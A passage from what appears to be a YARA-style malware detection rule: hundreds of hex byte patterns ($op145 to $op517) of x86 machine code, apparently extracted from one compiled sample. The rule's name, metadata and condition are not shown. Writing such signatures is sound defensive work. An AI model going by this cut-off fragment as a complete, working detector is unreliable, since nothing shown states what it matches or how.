    $op145 = { 83 C4 28 38 1D AD 79 44 00 74 19 FF 75 F8 A1 A8 }
    $op146 = { A0 AE 43 00 C7 84 24 C8 }
    $op147 = { 25 A2 41 00 C7 81 D4 03 00 00 8C 51 41 00 C7 81 }
    $op148 = { 59 59 85 C0 0F 85 B2 04 00 00 68 F0 53 43 00 FF }
    $op149 = { 85 C0 74 B6 FF 75 FC A1 A8 79 44 00 FF 90 60 02 }
    $op150 = { 89 75 D8 89 4D DC 89 75 E4 89 75 E8 FF 90 BC 02 }
    $op151 = { E0 67 43 00 C7 84 24 88 }
    $op152 = { 58 69 43 00 C7 84 24 CC }
    $op153 = { 50 28 43 00 C7 84 24 EC }
    $op154 = { 59 59 85 C0 0F 85 DD 01 00 00 68 40 56 43 00 FF }
    $op155 = { 59 59 85 C0 75 1D 68 10 5C 43 00 FF 75 88 A1 A8 }
    $op156 = { F4 F9 42 00 C7 84 24 F8 }
    $op157 = { 98 16 43 00 C7 84 24 90 }
    $op158 = { B5 42 00 C7 84 24 08 01 00 00 10 B5 42 00 C7 84 }
    $op159 = { AC F9 42 00 C7 84 24 E4 }
    $op160 = { A1 A8 79 44 00 8D 5F 10 68 14 DE 43 00 53 FF 90 }
    $op161 = { 08 AF 43 00 C7 84 24 E8 }
    $op162 = { 20 18 43 00 C7 84 24 EC }
    $op163 = { 56 68 9C 56 44 00 68 FF 7F 00 00 89 45 F8 50 A1 }
    $op164 = { 8D 45 F8 50 A1 A8 79 44 00 FF 90 F8 01 00 00 83 }
    $op165 = { 59 59 85 C0 0F 85 C0 01 00 00 68 34 5A 43 00 FF }
    $op166 = { 83 C4 18 89 45 FC 83 7D FC 00 75 2A 68 80 }
    $op167 = { 5F 3D 23 00 00 C0 75 57 8B 45 EC 03 C0 66 89 45 }
    $op168 = { 4C 17 43 00 C7 84 24 B4 }
    $op169 = { 8B 45 A4 59 59 85 C0 75 03 8B 45 B0 05 00 10 00 }
    $op170 = { 8B D8 59 59 85 DB 0F 84 90 }
    $op171 = { A8 EF 42 00 C7 84 24 EC }
    $op172 = { B8 70 79 44 00 BF 34 B0 42 00 2B C7 89 45 E4 0F }
    $op173 = { 9C F9 42 00 C7 84 24 E0 }
    $op174 = { 59 59 85 C0 0F 85 35 08 00 00 68 BC 51 43 00 FF }
    $op175 = { 85 C0 74 05 E9 EF 10 00 00 FF 75 14 FF 75 C8 FF }
    $op176 = { 24 F9 42 00 C7 84 24 CC }
    $op177 = { FF 75 18 FF 75 14 57 53 FF 90 84 02 00 00 83 C4 }
    $op178 = { 85 C0 0F 84 64 FC FF FF FF 74 24 0C A1 A8 79 44 }
    $op179 = { 59 59 85 C0 75 60 68 F4 58 43 00 FF 75 B8 A1 A8 }
    $op180 = { 5F 8B 45 FC 5E 5B C9 C3 55 8B EC 83 E4 F8 83 EC }
    $op181 = { B0 B4 42 00 C7 84 24 F4 }
    $op182 = { 59 59 85 C0 75 36 56 50 A1 A8 79 44 00 57 FF 90 }
    $op183 = { 8B D8 8B 45 0C 8B F8 59 03 C6 59 89 5D 10 89 45 }
    $op184 = { 78 3B 44 00 C7 84 24 94 }
    $op185 = { 59 59 85 C0 74 1B A1 A8 79 44 00 68 58 E4 43 00 }
    $op186 = { F4 40 44 00 C7 84 24 9C }
    $op187 = { 57 FF 75 08 89 45 C8 A1 A8 79 44 00 FF 90 B8 }
    $op188 = { 50 A1 A8 79 44 00 57 68 64 BF 43 00 68 94 C0 43 }
    $op189 = { 8B 45 0C 8B 4D 14 2B C8 83 E9 06 51 FF 75 FC 8D }
    $op190 = { 8B 4E 24 85 C9 0F 84 E6 }
    $op191 = { D4 41 44 00 C7 84 24 BC }
    $op192 = { FF 75 F8 A1 A8 79 44 00 57 68 04 C1 43 00 68 18 }
    $op193 = { 68 E0 09 44 00 FF 75 FC FF 91 60 01 00 00 8B 0D }
    $op194 = { 59 59 85 C0 0F 85 32 02 00 00 FF 75 D4 A1 A8 79 }
    $op195 = { 56 40 00 C7 41 70 0A 28 40 00 C7 81 30 04 00 00 }
    $op196 = { 50 8D 44 24 54 50 A1 A8 79 44 00 C7 44 24 58 18 }
    $op197 = { 59 59 85 C0 0F 85 6A 07 00 00 68 28 52 43 00 FF }
    $op198 = { B0 69 43 00 C7 84 24 D8 }
    $op199 = { 98 3B 44 00 C7 84 24 A4 }
    $op200 = { 08 18 43 00 C7 84 24 E4 }
    $op201 = { A1 A8 79 44 00 56 FF 75 0C FF 90 7C 01 00 00 8B }
    $op202 = { 83 C4 0C FF 75 BC FF 75 BC 0F B7 05 B8 79 44 00 }
    $op203 = { 68 B8 58 43 00 FF 75 B8 A1 A8 79 44 00 FF 90 90 }
    $op204 = { 39 35 D4 79 44 00 0F 85 9B }
    $op205 = { 59 59 85 C0 0F 85 95 04 00 00 68 08 54 43 00 FF }
    $op206 = { 83 C4 10 89 44 24 1C 8D 44 24 2C 50 56 FF 74 24 }
    $op207 = { 89 44 24 1C A1 A8 79 44 00 68 08 29 44 00 56 FF }
    $op208 = { 3B 43 00 C7 84 24 38 06 00 00 10 3B 43 00 C7 84 }
    $op209 = { F1 7A 40 00 C7 81 88 01 00 00 F8 94 41 00 C7 81 }
    $op210 = { 83 7D 0C 00 75 05 E9 8D }
    $op211 = { B4 43 00 C7 84 24 60 02 00 00 0C B4 43 00 C7 84 }
    $op212 = { 14 3C 44 00 C7 84 24 D4 }
    $op213 = { 59 59 85 C0 0F 85 87 07 00 00 68 18 52 43 00 FF }
    $op214 = { 40 18 43 00 C7 84 24 F8 }
    $op215 = { A1 A8 79 44 00 57 56 FF 90 2C 01 00 00 83 C4 28 }
    $op216 = { 59 59 85 C0 0F 85 9E 02 00 00 FF 75 C4 A1 A8 79 }
    $op217 = { FF 74 24 2C A1 A8 79 44 00 68 C8 63 43 00 53 FF }
    $op218 = { 8B 41 3C 3B C3 0F 84 E0 }
    $op219 = { BA BE BF F2 02 B9 12 04 CA 01 A3 A4 79 44 00 89 }
    $op220 = { 59 59 85 C0 0F 85 54 01 00 00 A1 A8 79 44 00 68 }
    $op221 = { 22 43 00 C7 84 24 24 03 00 00 18 22 43 00 C7 84 }
    $op222 = { D8 3B 44 00 C7 84 24 C0 }
    $op223 = { 53 68 4C E3 43 00 56 89 45 C0 50 A1 A8 79 44 00 }
    $op224 = { 44 EF 42 00 C7 84 24 D4 }
    $op225 = { 7C 3C 44 00 C7 84 24 F4 }
    $op226 = { 59 8B F0 59 8B 4D 08 89 75 0C 85 DB 7E 6D 57 8A }
    $op227 = { 87 43 00 C7 84 24 A8 03 00 00 08 87 43 00 C7 84 }
    $op228 = { 84 17 43 00 C7 84 24 BC }
    $op229 = { B8 40 44 00 C7 84 24 90 }
    $op230 = { 83 64 24 18 00 C7 05 00 B0 42 00 22 27 00 00 8B }
    $op231 = { 83 64 24 14 00 59 59 8B D8 BE FF 7F 00 00 33 C0 }
    $op232 = { 5F 85 C0 74 04 B0 01 C9 C3 A1 A8 79 44 00 53 56 }
    $op233 = { 85 C0 0F 85 1F 02 00 00 FF 74 24 24 A1 A8 79 44 }
    $op234 = { 8B F0 A1 A8 79 44 00 68 48 B7 42 00 56 FF 90 60 }
    $op235 = { 68 68 57 43 00 FF 75 B8 A1 A8 79 44 00 FF 90 90 }
    $op236 = { 1C AE 43 00 C7 84 24 A8 }
    $op237 = { 68 28 43 00 C7 84 24 F4 }
    $op238 = { 59 59 89 45 F4 8B 45 FC FF 30 8B 45 FC 83 C0 04 }
    $op239 = { 8B F0 0F B7 05 B8 79 44 00 50 A1 A8 79 44 00 68 }
    $op240 = { AC 27 43 00 C7 84 24 C0 }
    $op241 = { 56 8D 44 1B 02 50 FF 75 14 A1 A8 79 44 00 FF 90 }
    $op242 = { 04 3C 44 00 C7 84 24 D0 }
    $op243 = { 59 59 85 C0 0F 85 E7 03 00 00 68 74 54 43 00 FF }
    $op244 = { C4 40 44 00 C7 84 24 94 }
    $op245 = { 74 75 40 00 C7 81 20 04 00 00 82 96 41 00 C7 81 }
    $op246 = { 78 41 44 00 C7 84 24 AC }
    $op247 = { 98 6A 43 00 C7 84 24 F4 }
    $op248 = { 59 59 85 C0 0F 85 56 03 00 00 68 FC 54 43 00 FF }
    $op249 = { F0 F8 42 00 C7 84 24 BC }
    $op250 = { FF 4B 14 8B 5F 3A 03 5D 0C 83 7D A8 00 59 59 0F }
    $op251 = { E8 27 43 00 C7 84 24 D0 }
    $op252 = { 89 5C 24 64 89 5C 24 68 FF 90 BC 02 00 00 3D 22 }
    $op253 = { 83 4B 1C FF 59 59 EB 17 8B 4D F0 05 00 F0 FF FF }
    $op254 = { A1 A8 79 44 00 56 FF 90 00 04 00 00 A1 A8 79 44 }
    $op255 = { 83 C4 0C 68 14 59 43 00 FF 75 88 A1 A8 79 44 00 }
    $op256 = { FB 42 00 C7 84 24 34 01 00 00 10 FB 42 00 C7 84 }
    $op257 = { A1 A8 79 44 00 83 C4 0C FF 74 24 18 FF 90 74 01 }
    $op258 = { 89 75 EC 89 75 F0 FF 90 0C 03 00 00 F7 D8 1B C0 }
    $op259 = { 20 AF 43 00 C7 84 24 F4 }
    $op260 = { 3C 27 43 00 C7 84 24 A0 }
    $op261 = { 59 59 85 C0 0F 85 51 02 00 00 68 F0 55 43 00 FF }
    $op262 = { 59 59 85 C0 75 4F 68 D4 5B 43 00 FF 75 88 A1 A8 }
    $op263 = { 60 EF 42 00 C7 84 24 DC }
    $op264 = { 59 59 85 C0 0F 85 E2 02 00 00 68 60 55 43 00 FF }
    $op265 = { 10 AF 43 00 C7 84 24 EC }
    $op266 = { 83 C0 08 3B C3 0F 84 AB }
    $op267 = { 85 DB 74 56 FF 75 10 8B F0 FF 75 0C A1 A8 79 44 }
    $op268 = { D8 EF 42 00 C7 84 24 F4 }
    $op269 = { 70 42 44 00 C7 84 24 D0 }
    $op270 = { 59 59 8D 4D EC 51 56 8B F8 33 C0 57 50 89 45 FC }
    $op271 = { 59 59 3B C3 74 61 A1 A8 79 44 00 68 DC E5 43 00 }
    $op272 = { 59 59 85 C0 0F 85 F6 06 00 00 68 70 52 43 00 FF }
    $op273 = { 68 B0 42 43 00 FF 75 F0 57 FF 90 50 01 00 00 83 }
    $op274 = { 59 59 8B D8 8D 45 F0 50 56 53 57 89 7D FC 57 E9 }
    $op275 = { FF 75 0C 8B D8 A1 A8 79 44 00 68 00 B1 42 00 68 }
    $op276 = { 8D 45 EC 50 FF 75 FC A1 A8 79 44 00 FF 90 F8 02 }
    $op277 = { 59 59 83 67 04 00 83 67 08 00 8B 45 0C 5F C9 C3 }
    $op278 = { FF 75 F0 A1 A8 79 44 00 68 F0 C8 43 00 56 FF 50 }
    $op279 = { 59 59 85 C0 0F 85 17 02 00 00 FF 75 C0 A1 A8 79 }
    $op280 = { 0F 82 5A FF FF FF 5F 5E 8B E5 5D C3 55 8B EC 83 }
    $op281 = { 89 75 E4 89 75 E8 89 75 FC FF 90 BC 02 00 00 85 }
    $op282 = { FF 44 24 14 8D 47 44 50 A1 A8 79 44 00 FF 90 98 }
    $op283 = { 30 17 43 00 C7 84 24 AC }
    $op284 = { 59 59 85 C0 0F 85 A4 07 00 00 68 FC 51 43 00 FF }
    $op285 = { 83 7D 10 01 59 59 8B F0 75 10 FF 75 0C FF 35 BC }
    $op286 = { 59 59 85 C0 0F 85 F1 05 00 00 68 24 53 43 00 FF }
    $op287 = { FC 27 43 00 C7 84 24 D4 }
    $op288 = { 88 F8 42 00 C7 84 24 A8 }
    $op289 = { B2 43 00 C7 84 24 D4 01 00 00 08 B2 43 00 C7 84 }
    $op290 = { 30 AE 43 00 C7 84 24 AC }
    $op291 = { 53 FF 75 08 8B F0 A1 A8 79 44 00 FF 90 78 02 00 }
    $op292 = { 8C 40 44 00 C7 84 24 8C }
    $op293 = { 83 C4 18 89 45 FC 83 7D FC 00 74 6C 8B 45 FC 81 }
    $op294 = { 8B 45 FC 8B 00 8D 44 00 02 50 FF 75 08 A1 A8 79 }
    $op295 = { C8 AD 43 00 C7 84 24 90 }
    $op296 = { 64 17 43 00 C7 84 24 B8 }
    $op297 = { 85 C0 75 24 FF 74 24 0C A1 A8 79 44 00 FF 75 08 }
    $op298 = { 59 59 85 C0 0F 85 BC 06 00 00 68 94 52 43 00 FF }
    $op299 = { 89 5D D4 89 7D DC 89 5D E0 89 5D E4 FF 90 BC 02 }
    $op300 = { F4 B3 42 00 C7 84 24 B4 }
    $op301 = { 8B 45 FC 0F B7 40 04 83 F8 25 0F 85 D9 }
    $op302 = { 59 59 5E 83 7D F4 00 74 19 8B 47 08 05 00 10 00 }
    $op303 = { 50 A1 A8 79 44 00 53 56 FF 90 BC }
    $op304 = { 8B 46 3A 03 C3 50 A1 A8 79 44 00 FF 90 04 04 00 }
    $op305 = { 44 F8 42 00 C7 84 24 98 }
    $op306 = { 59 59 85 C0 0F 85 FB 07 00 00 68 D4 51 43 00 FF }
    $op307 = { FF 75 FC A1 A8 79 44 00 57 68 04 C6 43 00 68 20 }
    $op308 = { 90 41 44 00 C7 84 24 B0 }
    $op309 = { 70 16 43 00 C7 84 24 84 }
    $op310 = { 1C F0 42 00 C7 84 24 00 01 00 00 38 F0 42 00 C7 }
    $op311 = { 68 B4 57 43 00 FF 75 B8 A1 A8 79 44 00 FF 90 90 }
    $op312 = { E0 F9 42 00 C7 84 24 F4 }
    $op313 = { 83 C4 0C 68 FC 80 43 00 8D 45 C0 50 A1 A8 79 44 }
    $op314 = { 59 59 56 56 FF 74 24 38 89 44 24 24 50 8D 44 24 }
    $op315 = { 8B 45 F8 80 38 03 0F 85 FC }
    $op316 = { 14 43 44 00 C7 84 24 E4 }
    $op317 = { 30 EE 42 00 C7 84 24 88 }
    $op318 = { 85 C0 74 05 E9 50 01 00 00 6A 01 8D 45 E8 50 8D }
    $op319 = { 59 59 8B F8 89 5D F4 89 5D F8 C6 45 FF 01 EB 51 }
    $op320 = { CC 17 43 00 C7 84 24 D4 }
    $op321 = { 68 B3 42 00 C7 84 24 98 }
    $op322 = { 35 43 00 C7 84 24 78 04 00 00 10 35 43 00 C7 84 }
    $op323 = { 10 D5 40 00 B8 9B A6 41 00 89 81 74 03 00 00 C7 }
    $op324 = { 48 42 44 00 C7 84 24 C8 }
    $op325 = { 85 C0 75 35 A1 A8 79 44 00 53 8D B8 C4 01 00 00 }
    $op326 = { 68 FE FF 00 00 FF 75 08 89 44 24 24 A1 A8 79 44 }
    $op327 = { B7 6C 40 00 C7 81 50 02 00 00 3E 6F 40 00 C7 41 }
    $op328 = { 39 5D 14 59 8B F0 59 89 75 F8 7E 36 57 8B 45 10 }
    $op329 = { 8B F8 0F B7 05 B8 79 44 00 50 A1 A8 79 44 00 68 }
    $op330 = { 59 59 85 C0 0F 85 18 08 00 00 68 C8 51 43 00 FF }
    $op331 = { A2 43 00 C7 84 24 44 0B 00 00 08 A2 43 00 C7 84 }
    $op332 = { FF 75 F8 A1 A8 79 44 00 57 68 98 C0 43 00 68 B0 }
    $op333 = { 59 59 85 C0 0F 85 69 01 00 00 68 D0 56 43 00 FF }
    $op334 = { D8 27 43 00 C7 84 24 CC }
    $op335 = { A1 A8 79 44 00 83 C4 50 FF 75 FC 57 68 A4 C6 43 }
    $op336 = { 66 3B D8 74 0A 46 46 0F B7 06 66 85 C0 75 D3 33 }
    $op337 = { 98 B4 42 00 C7 84 24 EC }
    $op338 = { 85 C0 0F 84 F2 FE FF FF A1 A8 79 44 00 53 FF 75 }
    $op339 = { 59 59 85 C0 0F 85 39 03 00 00 68 14 55 43 00 FF }
    $op340 = { FF 35 D0 79 44 00 89 44 24 28 68 44 74 43 00 56 }
    $op341 = { 59 59 8B F8 8D 44 24 14 50 FF 74 24 18 8D 44 24 }
    $op342 = { A1 A8 79 44 00 8D 5E 0C 68 A8 DD 43 00 53 FF 90 }
    $op343 = { FF 90 C4 03 00 00 59 59 8D 45 E0 50 A1 A8 79 44 }
    $op344 = { 53 53 FF 35 BC 79 44 00 89 45 D4 A1 A8 79 44 00 }
    $op345 = { 68 47 80 00 00 6A 00 89 44 24 24 50 A1 A8 79 44 }
    $op346 = { 50 68 00 00 10 80 8D 44 24 50 50 A1 A8 79 44 00 }
    $op347 = { 54 3C 44 00 C7 84 24 E8 }
    $op348 = { 59 59 85 C0 0F 85 12 01 00 00 68 EC 5A 43 00 FF }
    $op349 = { D4 16 43 00 C7 84 24 9C }
    $op350 = { A8 EE 42 00 C7 84 24 A4 }
    $op351 = { F8 3B 44 00 C7 84 24 CC }
    $op352 = { 59 59 85 C0 0F 85 71 01 00 00 A1 A8 79 44 00 68 }
    $op353 = { F4 EE 42 00 C7 84 24 BC }
    $op354 = { 80 8D 45 F8 50 A1 A8 79 44 00 6A 00 FF 50 44 C9 }
    $op355 = { 83 C4 0C 8B 45 F8 5E 5F 5B C9 C3 55 8B EC 51 A1 }
    $op356 = { 89 5D E4 89 5D E8 FF 90 BC 02 00 00 85 C0 7D 07 }
    $op357 = { FF 75 14 8B 45 FC 83 C0 04 50 FF 75 0C A1 A8 79 }
    $op358 = { 30 B4 42 00 C7 84 24 C8 }
    $op359 = { FC 69 43 00 C7 84 24 E0 }
    $op360 = { 68 27 43 00 C7 84 24 AC }
    $op361 = { BC EF 42 00 C7 84 24 F0 }
    $op362 = { A1 A8 79 44 00 83 C4 40 FF 75 10 68 1C B7 42 00 }
    $op363 = { 7C B4 42 00 C7 84 24 E0 }
    $op364 = { 24 28 43 00 C7 84 24 E0 }
    $op365 = { A0 B4 42 00 C7 84 24 F0 }
    $op366 = { 50 A1 A8 79 44 00 51 FF 90 B8 }
    $op367 = { 8D 47 FC 50 A1 A8 79 44 00 53 FF 90 B4 }
    $op368 = { 5C 27 43 00 C7 84 24 A8 }
    $op369 = { 89 75 E4 89 75 E8 FF 90 BC 02 00 00 3D 22 00 00 }
    $op370 = { 59 59 89 45 EC 0F B7 05 B8 79 44 00 50 68 74 44 }
    $op371 = { 56 FF 74 24 18 8B F8 A1 A8 79 44 00 57 FF 90 D0 }
    $op372 = { 19 43 00 C7 84 24 10 01 00 00 1C 19 43 00 C7 84 }
    $op373 = { A1 A8 79 44 00 56 53 FF 90 2C 01 00 00 83 C4 1C }
    $op374 = { 8D 47 44 68 5C 61 43 00 50 A1 A8 79 44 00 FF 90 }
    $op375 = { 8B 46 04 8B 0D 98 79 44 00 89 88 C4 }
    $op376 = { A1 A8 79 44 00 53 68 00 08 00 00 FF 75 08 FF 90 }
    $op377 = { 51 50 A1 A8 79 44 00 FF 90 B8 }
    $op378 = { 51 50 A1 A8 79 44 00 FF 90 B8 }
    $op379 = { AC 17 43 00 C7 84 24 C8 }
    $op380 = { 83 C4 10 FF 75 10 89 45 F8 8D 45 DC 50 A1 A8 79 }
    $op381 = { 59 59 85 C0 0F 85 12 01 00 00 68 50 57 43 00 FF }
    $op382 = { 0F 82 60 FF FF FF A1 A8 79 44 00 68 A0 38 44 00 }
    $op383 = { 8B 44 24 0C 83 C0 44 68 DC 7F 43 00 50 A1 A8 79 }
    $op384 = { BC B4 42 00 C7 84 24 F8 }
    $op385 = { 89 5D CC 89 4D D0 89 5D D8 89 5D DC FF 90 BC 02 }
    $op386 = { 20 27 43 00 C7 84 24 98 }
    $op387 = { 59 59 8B F8 8D 44 24 20 50 FF 74 24 24 8D 44 24 }
    $op388 = { 59 59 8B F0 8D 45 FC 50 FF 75 FC 8D 45 F4 56 6A }
    $op389 = { A1 A8 79 44 00 83 C4 0C FF 74 24 0C FF 90 74 01 }
    $op390 = { E9 89 FE FF FF A1 A8 79 44 00 53 57 68 5C B0 42 }
    $op391 = { 28 AF 43 00 C7 84 24 F8 }
    $op392 = { 59 59 85 C0 0F 85 6E 02 00 00 68 70 59 43 00 FF }
    $op393 = { FF 75 10 8B F8 A1 A8 79 44 00 68 10 B7 42 00 56 }
    $op394 = { 39 35 D4 79 44 00 0F 85 C6 }
    $op395 = { 92 43 00 C7 84 24 A0 06 00 00 10 92 43 00 C7 84 }
    $op396 = { EC EE 42 00 C7 84 24 B8 }
    $op397 = { 59 59 85 C0 0F 85 2F 01 00 00 68 C8 5A 43 00 FF }
    $op398 = { 8B 4E 24 C1 E1 02 51 FF 75 FC 89 45 F8 50 A1 A8 }
    $op399 = { 6A 22 8D 45 EC 50 FF 75 7C A1 A8 79 44 00 C7 45 }
    $op400 = { 58 41 44 00 C7 84 24 A8 }
    $op401 = { 89 7D C4 89 7D C8 FF 90 48 03 00 00 85 C0 0F 85 }
    $op402 = { D0 3B 44 00 C7 84 24 BC }
    $op403 = { 89 5C 24 64 89 5C 24 68 FF 90 BC 02 00 00 85 C0 }
    $op404 = { DC AE 43 00 C7 84 24 D8 }
    $op405 = { A1 A8 79 44 00 53 8B 5D 08 56 57 68 FE FF 00 00 }
    $op406 = { 59 59 85 C0 0F 85 8B 02 00 00 68 58 59 43 00 FF }
    $op407 = { 94 3C 44 00 C7 84 24 FC }
    $op408 = { B0 EE 42 00 C7 84 24 A8 }
    $op409 = { FF 90 BC 02 00 00 85 C0 A1 A8 79 44 00 74 12 FF }
    $op410 = { FF 75 10 89 45 F8 0F B7 45 0C 50 A1 A8 79 44 00 }
    $op411 = { 8B 15 84 A0 42 00 89 91 A4 02 00 00 C7 81 38 02 }
    $op412 = { 89 5E 10 89 5E 14 FF 90 BC 02 00 00 85 C0 74 2A }
    $op413 = { FF 75 10 A1 A8 79 44 00 68 34 B7 42 00 56 57 FF }
    $op414 = { 59 59 85 C0 0F 85 4D 07 00 00 68 44 52 43 00 FF }
    $op415 = { 30 EF 42 00 C7 84 24 D0 }
    $op416 = { 59 59 85 C0 0F 85 C0 01 00 00 68 64 56 43 00 FF }
    $op417 = { 94 EE 42 00 C7 84 24 A0 }
    $op418 = { 8B 6C 24 24 8B 5C 24 20 59 59 8B F8 BE FF 7F 00 }
    $op419 = { 33 DB 39 5D 14 59 8B F0 59 89 75 FC 7E 2E 8B 45 }
    $op420 = { FF 90 0C 03 00 00 F7 D8 1B C0 F7 D0 23 45 FC 5F }
    $op421 = { 24 B4 42 00 C7 84 24 C4 }
    $op422 = { 80 3B 44 00 C7 84 24 98 }
    $op423 = { 57 FF 75 08 89 45 E0 A1 A8 79 44 00 FF 90 B8 }
    $op424 = { FF 75 FC A1 A8 79 44 00 57 68 38 C6 43 00 68 50 }
    $op425 = { 68 E0 57 43 00 FF 75 B8 A1 A8 79 44 00 FF 90 90 }
    $op426 = { 8B 45 FC 83 38 04 0F 8E E9 }
    $op427 = { 38 B4 42 00 C7 84 24 CC }
    $op428 = { FF 74 24 48 A1 A8 79 44 00 53 FF 90 2C 01 00 00 }
    $op429 = { 4C 69 43 00 C7 84 24 C8 }
    $op430 = { 85 C0 74 02 EB 60 FF 75 F4 FF 75 18 FF 75 08 A1 }
    $op431 = { 6C 43 44 00 C7 84 24 F4 }
    $op432 = { A1 A8 79 44 00 68 2C E5 43 00 FF 75 F8 FF 90 90 }
    $op433 = { 8B 44 24 20 83 C0 04 50 FF 75 08 A1 A8 79 44 00 }
    $op434 = { A1 A8 79 44 00 59 59 68 A8 6B 44 00 68 E0 6B 44 }
    $op435 = { 28 EE 42 00 C7 84 24 84 }
    $op436 = { 85 C0 74 25 8D 45 F4 50 A1 A8 79 44 00 FF 90 A4 }
    $op437 = { A1 A8 79 44 00 56 FF 90 D0 03 00 00 A1 A8 79 44 }
    $op438 = { FF 75 08 A1 A8 79 44 00 FF 73 08 FF 90 9C }
    $op439 = { E9 B0 FE FF FF A1 A8 79 44 00 53 57 68 50 B0 42 }
    $op440 = { 59 89 45 F8 59 8D 45 FC 50 8D 45 F4 50 8D 45 EC }
    $op441 = { 8B F8 A1 D0 79 44 00 33 F6 59 59 89 7C 24 20 3B }
    $op442 = { 89 75 D8 89 75 E4 89 75 E8 FF 90 BC 02 00 00 53 }
    $op443 = { 59 59 8B F8 8D 45 F4 50 56 57 53 89 5D FC 53 E9 }
    $op444 = { C0 17 43 00 C7 84 24 D0 }
    $op445 = { 8B F0 83 C4 0C 3B F3 75 14 8D 45 FC 50 A1 A8 79 }
    $op446 = { 59 59 85 C0 0F 85 3E 04 00 00 68 48 54 43 00 FF }
    $op447 = { E8 AE 43 00 C7 84 24 DC }
    $op448 = { 80 AE 43 00 C7 84 24 C0 }
    $op449 = { C7 43 0C 20 02 00 00 89 5D F0 FF 50 68 53 FF 75 }
    $op450 = { E9 62 FE FF FF A1 A8 79 44 00 53 57 68 64 B0 42 }
    $op451 = { 59 59 85 C0 0F 85 26 05 00 00 68 AC 53 43 00 FF }
    $op452 = { 66 8B 4D 0A 66 3B C8 74 C7 46 46 66 83 3E 00 0F }
    $op453 = { 59 59 85 C0 0F 85 EC 04 00 00 68 C8 53 43 00 FF }
    $op454 = { C0 41 44 00 C7 84 24 B8 }
    $op455 = { 85 C0 75 D6 8D 45 C0 50 A1 A8 79 44 00 FF 50 1C }
    $op456 = { 40 28 43 00 C7 84 24 E8 }
    $op457 = { 14 28 43 00 C7 84 24 DC }
    $op458 = { FF 75 F8 A1 A8 79 44 00 57 68 D0 C0 43 00 68 E4 }
    $op459 = { FF 75 10 8B F8 FF 75 0C A1 A8 79 44 00 68 B4 60 }
    $op460 = { B0 3B 44 00 C7 84 24 B0 }
    $op461 = { 83 65 08 00 83 65 F8 00 8B D8 66 8B 46 02 66 48 }
    $op462 = { 59 59 85 C0 74 15 B3 01 A1 A8 79 44 00 56 57 FF }
    $op463 = { 59 59 56 56 57 8B D8 53 8D 45 F4 50 A1 A8 79 44 }
    $op464 = { 59 59 85 C0 75 79 68 D4 58 43 00 FF 75 B8 A1 A8 }
    $op465 = { 59 59 85 C0 0F 85 5B 04 00 00 68 2C 54 43 00 FF }
    $op466 = { A1 A8 79 44 00 56 57 BE FF 7F 00 00 56 FF 75 08 }
    $op467 = { A1 A8 79 44 00 56 57 BE FF 7F 00 00 56 FF 75 08 }
    $op468 = { 83 C4 0C 5F 33 C0 5E 5D C3 55 8B EC 83 E4 F8 83 }
    $op469 = { 59 59 5F 5E C3 55 8B EC 83 EC 28 6A 0A 8D 45 D8 }
    $op470 = { A1 A8 79 44 00 68 94 77 44 00 56 FF 90 74 03 00 }
    $op471 = { 59 59 85 C0 75 47 33 C0 66 89 45 B0 33 C0 8D 7D }
    $op472 = { 40 69 43 00 C7 84 24 C4 }
    $op473 = { 59 59 85 C0 0F 85 30 07 00 00 68 50 52 43 00 FF }
    $op474 = { 8D 45 DC 50 68 00 01 08 00 8D 45 FC 50 A1 A8 79 }
    $op475 = { A1 43 00 C7 84 24 F8 0A 00 00 0C A1 43 00 C7 84 }
    $op476 = { D0 AE 43 00 C7 84 24 D4 }
    $op477 = { 30 40 44 00 C7 84 24 84 }
    $op478 = { F8 26 43 00 C7 84 24 8C }
    $op479 = { E9 37 FE FF FF 55 8B EC 83 E4 F8 81 EC 9C 01 00 }
    $op480 = { 04 FA 42 00 C7 84 24 FC }
    $op481 = { 20 41 44 00 C7 84 24 A4 }
    $op482 = { 80 43 44 00 C7 84 24 F8 }
    $op483 = { 34 77 40 00 C7 81 A4 03 00 00 E3 F9 40 00 89 91 }
    $op484 = { 10 40 00 C7 81 0C 04 00 00 AE 2B 40 00 C7 81 C8 }
    $op485 = { 89 5C 24 5C 89 5C 24 60 FF 90 0C 03 00 00 85 C0 }
    $op486 = { B2 3E 40 00 C7 81 4C 02 00 00 36 1B 40 00 C7 81 }
    $op487 = { 59 59 85 C0 0F 85 04 04 00 00 68 68 54 43 00 FF }
    $op488 = { BC 16 43 00 C7 84 24 98 }
    $op489 = { 50 A1 A8 79 44 00 FF 90 1C 01 00 00 83 C4 1C EB }
    $op490 = { DC 68 43 00 C7 84 24 B4 }
    $op491 = { 3C F9 42 00 C7 84 24 D0 }
    $op492 = { B8 F9 42 00 C7 84 24 E8 }
    $op493 = { CC 27 43 00 C7 84 24 C8 }
    $op494 = { 3B 05 D8 79 44 00 75 1B 8B 46 04 FF 80 B8 }
    $op495 = { FF 75 0C 8B D8 A1 A8 79 44 00 68 80 B0 42 00 68 }
    $op496 = { 83 C4 50 8D 45 F4 50 A1 A8 79 44 00 FF 90 F8 01 }
    $op497 = { 58 42 44 00 C7 84 24 CC }
    $op498 = { 81 7C 24 10 10 27 00 00 0F 8F D8 }
    $op499 = { 89 5D E0 89 5D E4 FF 90 BC 02 00 00 89 45 0C 3D }
    $op500 = { 8B 45 08 05 00 F0 FF FF 89 46 1C 53 FF 77 08 E8 }
    $op501 = { 50 A1 A8 79 44 00 56 68 30 64 43 00 56 53 FF 90 }
    $op502 = { A1 A8 79 44 00 8B 40 50 83 C4 0C 3B C3 74 0B 8D }
    $op503 = { 83 C4 0C 83 4B 0C 04 8B 07 5E 5B 5F C9 C3 55 8B }
    $op504 = { 72 B6 FF 75 F8 A1 A8 79 44 00 FF 75 08 FF 90 2C }
    $op505 = { F0 AD 43 00 C7 84 24 98 }
    $op506 = { B4 26 43 00 C7 84 24 84 }
    $op507 = { 59 59 85 C0 0F 85 8E 01 00 00 A1 A8 79 44 00 68 }
    $op508 = { 38 B3 42 00 C7 84 24 90 }
    $op509 = { FF 75 10 8B F8 FF 75 0C A1 A8 79 44 00 68 D8 5F }
    $op510 = { 50 EE 42 00 C7 84 24 94 }
    $op511 = { 8C AE 43 00 C7 84 24 C4 }
    $op512 = { 7C F9 42 00 C7 84 24 DC }
    $op513 = { FF 74 24 54 A1 A8 79 44 00 68 40 63 43 00 68 48 }
    $op514 = { FF 75 0C 50 A1 A8 79 44 00 FF 90 40 01 00 00 59 }
    $op515 = { 14 27 43 00 C7 84 24 94 }
    $op516 = { 89 46 3A 85 C0 74 4F 89 7E 28 8B 7E 3A 03 7D 08 }
    $op517 = { C8 67 43 00 C7 84 24 84 }
